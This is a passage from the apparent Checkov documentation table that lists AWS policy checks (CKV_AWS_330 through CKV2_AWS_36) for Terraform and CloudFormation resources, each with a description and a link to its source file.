[EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | -| 772 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | -| 773 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | -| 774 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | -| 775 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | -| 776 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | -| 777 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | -| 778 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | -| 779 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | -| 780 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | -| 781 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | -| 782 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | -| 783 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 784 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | -| 785 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 786 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 787 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 788 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 789 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 790 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 791 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | -| 792 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | -| 793 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 794 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | -| 795 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | -| 796 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | -| 797 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | -| 798 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | -| 799 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | -| 800 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | -| 801 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | -| 802 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 803 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | -| 804 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 805 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | -| 806 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 807 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 808 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 809 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 810 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | -| 811 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | -| 812 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | -| 813 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | -| 814 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | -| 815 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 816 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | -| 817 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 818 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 819 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | -| 820 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 821 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 822 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 823 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 824 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | -| 825 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | -| 826 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 827 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 828 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 829 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 830 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 831 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 832 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 833 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 834 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | -| 835 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 836 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 837 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 838 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 839 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | -| 840 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | -| 841 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | -| 842 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | -| 843 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 844 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 845 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 846 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 847 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 848 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 849 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 850 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 851 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 852 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | -| 853 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 854 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 855 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 856 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 857 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 858 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 859 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | -| 860 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | -| 861 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | -| 862 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 863 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 864 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 865 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 866 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 867 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 868 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 869 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 870 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | -| 871 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | -| 872 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | -| 873 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | -| 874 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | -| 875 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 876 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 877 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to 